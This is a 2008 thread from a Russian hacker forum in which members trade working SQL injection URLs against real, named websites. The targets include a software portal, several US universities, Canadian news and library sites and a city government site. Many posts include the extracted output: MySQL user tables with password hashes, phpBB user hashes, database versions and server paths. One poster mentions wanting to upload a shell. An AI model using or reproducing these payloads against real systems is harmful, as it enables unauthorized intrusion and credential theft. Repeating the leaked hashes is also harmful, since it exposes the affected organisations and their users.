ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6731  
Старый 24.10.2008, 22:30
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Dimi4
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,table_name))),2,3+from+informat ion_schema.tables+limit+17,1--
таблы..
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,user,password))),2,3+from+mysql .user+limit+1,1--
рут..
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,table_name,table_schema))),2,3+ from+information_schema.columns+where+column_name+ like+char(112,97,115,115,119,111,114,100)+limit+1, 1--
таблицы с паролями..
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,username,user_password))),2,3+f rom+forum.phpbb_users+limit+2,1--
makarich:$H$93X6wK/iq5UvwhwhZXbbnU.RT7gb0W.

жаль так бы шелл залили..
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+freeware32 .persons+limit+1,1--
пассы юзеров.. хешшированые.
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+persons+li mit+1,1--
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex( hex(concat_ws(0x3a,password))),2,3+from+admin+limi t+1,1--
админ.. кто разшефрует будет хорошо )

а вот и freeware32.ru/admin

Последний раз редактировалось sabe; 24.10.2008 в 22:55..
 
Ответить с цитированием

  #6732  
Старый 25.10.2008, 01:19
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

мда, там вообще не поймешь что:

Макаев Юрий Александрович:1$MgT.b/LSoOE

и админка все-равно защищена .htaccess
 
Ответить с цитированием

  #6733  
Старый 25.10.2008, 02:45
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от nonamez  
Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))



Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.



Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.
 
Ответить с цитированием

  #6734  
Старый 25.10.2008, 03:03
Аватар для keng
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Цитата:
Сообщение от warlok  
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.
http://www.lzs.lt/?lt=1185259934&article=1+union+select+concat_ws(0x 20,name,pass)+from+users+where+id=300/*

Бруть наздоровье.
 
Ответить с цитированием

  #6735  
Старый 25.10.2008, 10:35
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

продолжаем серию .edu ...
Sioux Falls Seminary(сам не знаю что это значит... =) )
Код:
http://www.sfseminary.edu/about/index.php?id=9&entryid=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15/*
PR=6
4.1.25-Debian_mt1

-----------------------------------------------------------------

Northwest University
Код:
http://www.northwestu.edu/calendar/view.php?id=-3151+union+select+1,2,3,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),5,6,7,8,9,10,11,12+from+mysql.user/*
PR=6
5.0.45-community-nt
mysql.user
root:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:loc alhost
devin.ellis:*001FD03A448FDAA34AE4EEC54A6269A02931D F74:chilen0:%
dennis.williams:*585198B8A7F5B514497FDE9FC1243891A 80020C8:ba1l3y00:%
odbc:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:%
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:lo calhost
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:%
Путь: W:\northwestu\calendar\view.php
-----------------------------------------------------------------

Х.З что...
Код:
http://www.art.uiowa.edu/directory.php?id=-44+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+18,1/*
PR=6
5.0.26-log
-----------------------------------------------------------------

Тоже х.з что...
Код:
https://cat.ipac.caltech.edu/sscconf07/view_abstract.php?id=-85+union+select+1,2,version(),4/*
5.0.27-standard

Последний раз редактировалось Iceangel_; 25.10.2008 в 11:55..
 
Ответить с цитированием

  #6736  
Старый 25.10.2008, 18:39
Аватар для luz3r
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
По умолчанию

Цитата:
http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,10,12,13,14,15 ,16,17/*
5 поле
 
Ответить с цитированием

  #6737  
Старый 26.10.2008, 10:26
Аватар для Robox
Robox
Познающий
Регистрация: 26.12.2007
Сообщений: 43
Провел на форуме:
120821

Репутация: 9
По умолчанию

Цитата:
http://www.weightonline.com.au/products.php?pid=-89+UniON+Select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
версия 5.0.45-COMMUNITY
админки не нашёл(
 
Ответить с цитированием

  #6738  
Старый 26.10.2008, 10:30
Аватар для Robox
Robox
Познающий
Регистрация: 26.12.2007
Сообщений: 43
Провел на форуме:
120821

Репутация: 9
По умолчанию

Цитата:
http://www.winelistaustralia.com.au/wineShow.php?pid=1033'
инклудидтся, только админка прикрыта(
 
Ответить с цитированием

  #6739  
Старый 26.10.2008, 11:48
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

А не подскажите...
Можно ли провести тут инъекцию? И в какую сторону копать?
Код:
_http://la2.raid.ru/index.php?act=clan_info&id=1
 
Ответить с цитированием

  #6740  
Старый 26.10.2008, 12:26
Аватар для А®ТеS
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Разные разности:
Код:
http://www.owensound.library.on.ca/news-full.php?NewsID=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/*
http://www.spec.bc.ca/news/news.php?newsID=999999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--
http://www.1049thebeach.ca/news_item.php?NewsID=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.nlc.bc.ca/public.news.php?NewsActiveList=newsdetails&NewsID=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.onlc.ca/newsfull.php?NewsID=999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
http://www.myheritage.es/FP/newsItem.php?s=786&newsID=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*&sourceList=dir
http://www.vibez.us/en/products/detail_mp3.php?pid=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&page=3
http://www.park-ridge.il.us/record.php?_ID=99999+union+select+1,concat_ws(0x3a,username,PASSWORD,ip),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+prkhome_ciab.ciab_member
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ